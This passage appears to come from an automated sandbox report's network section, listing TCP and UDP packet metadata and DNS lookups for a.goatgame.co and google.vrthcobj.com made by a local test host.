Aug 3, 2021 23:42:11.458043098 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.458045959 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.458096027 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.458138943 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.458138943 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462671995 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462722063 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462754965 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.462774992 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462817907 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.462833881 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462889910 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462941885 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.462943077 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.462994099 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463042974 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.463044882 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463098049 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463157892 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.463221073 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463284016 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463330030 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463346004 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.463378906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463423967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463427067 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.463469982 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463515997 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.463521957 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463571072 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463618040 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.463618994 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463659048 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.463709116 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464241982 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464292049 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464334011 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464344025 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464371920 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464406967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464445114 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464461088 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464519024 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464545012 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464574099 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464615107 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464631081 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464653015 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464698076 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464874983 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464920998 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464958906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.464982986 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.464994907 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.465024948 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.465039968 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.466114998 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.466166019 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.466195107 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.466226101 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.466268063 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.466274023 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.466296911 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.466346025 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.467952013 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.467993021 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.468018055 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.468050003 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.519409895 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.711246967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711278915 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711298943 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711318016 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711338997 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711354971 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.711390972 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.711586952 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711638927 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.711663961 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711680889 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711694956 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.711752892 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.712255001 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.712274075 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.712285995 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.712301016 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.712316990 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.712322950 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.712343931 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.712399006 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.714853048 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.714874983 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.714890957 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.714905977 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.714920998 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.714931965 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.714982033 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719225883 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719259977 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719276905 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719327927 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719358921 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719367027 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719382048 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719398022 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719425917 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719439030 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719465017 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719486952 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719491959 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719513893 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719533920 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719542027 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719572067 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719588041 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719613075 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719638109 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719717026 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719750881 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.719773054 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.719782114 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.726747036 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.726856947 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.726906061 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.726918936 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727005005 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727015972 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727242947 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727313042 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727317095 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727368116 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727416039 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727425098 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727479935 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727535009 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727536917 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727585077 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727636099 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727643967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727701902 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727736950 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727745056 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727785110 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727835894 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.727849007 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727886915 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.727930069 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.964967012 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.964989901 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965003967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965018988 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965034008 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965059042 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.965150118 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.965295076 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965312004 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965326071 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965343952 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.965348959 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.965374947 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.966864109 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.966883898 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.966898918 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.966914892 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.966931105 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.966989994 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.967022896 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.967034101 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.967314959 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.967331886 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.967343092 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.967354059 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.967391968 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.967421055 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:11.968945026 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.968962908 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:11.969037056 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.002911091 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.019642115 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557585955 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557665110 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557729959 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557787895 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557842970 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557866096 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.557910919 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557965040 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.557980061 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.558017015 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.558073044 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.558121920 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.558126926 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.558137894 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.558216095 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.558818102 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.558865070 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.558984041 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.821671009 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.821708918 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.821726084 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.821747065 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.821763039 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.821980953 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.822021961 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822084904 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822187901 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.822232008 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822280884 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822316885 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822343111 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.822371960 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.822891951 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822936058 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.822969913 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.823033094 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.823303938 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.823349953 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.823388100 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.823430061 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.823447943 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.823470116 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.823493004 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.823565960 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.824213028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.824256897 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.824294090 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.824318886 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.824333906 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.824362040 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:12.824392080 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:12.878956079 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.070254087 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070316076 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070344925 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070369005 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070393085 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070571899 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070583105 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.070604086 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070626020 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070647955 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070667028 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.070724010 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.070760965 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.076015949 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076040983 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076062918 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076085091 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076106071 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076273918 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.076405048 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.076555967 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076610088 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076648951 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076684952 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076714993 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.076740026 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.076838017 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.077397108 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077446938 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077481031 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077603102 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.077847004 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077889919 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077928066 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077961922 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.077975988 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.077980995 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.078015089 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.078115940 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.078722954 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.078766108 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.078797102 CEST	443	49712	172.67.146.70	192.168.2.3
Aug 3, 2021 23:42:13.078825951 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:13.128956079 CEST	49712	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:42:14.147680998 CEST	49712	443	192.168.2.3	172.67.146.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 23:41:59.158646107 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:41:59.184545994 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 3, 2021 23:41:59.938543081 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:41:59.963732958 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:00.741821051 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:00.766784906 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:01.671165943 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:01.698786974 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:02.675854921 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:02.708280087 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:03.780181885 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:03.805951118 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:04.752377033 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:04.776922941 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:05.417403936 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:05.449994087 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:06.845972061 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:06.873339891 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:07.835000038 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:07.867800951 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:08.197936058 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:08.233841896 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:08.555628061 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:08.580760002 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:09.380799055 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:09.417661905 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:10.217458010 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:10.244851112 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:10.861213923 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:10.888822079 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:11.512830973 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:11.540487051 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:12.335515976 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:12.361551046 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:13.635502100 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:13.660516024 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:16.394717932 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:16.395879984 CEST	57568	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:42:16.422513962 CEST	53	58823	8.8.8.8	192.168.2.3
Aug 3, 2021 23:42:16.431968927 CEST	53	57568	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 23:42:08.197936058 CEST	192.168.2.3	8.8.8.8	0x293	Standard query (0)	a.goatgame.co	A (IP address)	IN (0x0001)
Aug 3, 2021 23:42:16.394717932 CEST	192.168.2.3	8.8.8.8	0x7c06	Standard query (0)	google.vrthcobj.com	A (IP address)	IN (0x0001)
Aug 3, 2021 23:42:16.395879984 CEST	192.168.2.3	8.8.8.8	0xbcfd	Standard query (0)	google.vrthcobj.com	28	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Aug 3, 2021 23:42:08.233841896 CEST	8.8.8.8	192.168.2.3	0x293	No error (0)	a.goatgame.co	172.67.146.70	A (IP address)	IN (0x0001)
Aug 3, 2021 23:42:08.233841896 CEST	8.8.8.8	192.168.2.3	0x293	No error (0)	a.goatgame.co	104.21.79.144	A (IP address)	IN (0x0001)
Aug 3, 2021 23:42:16.422513962 CEST	8.8.8.8	192.168.2.3	0x7c06	No error (0)	google.vrthcobj.com	34.97.69.225	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
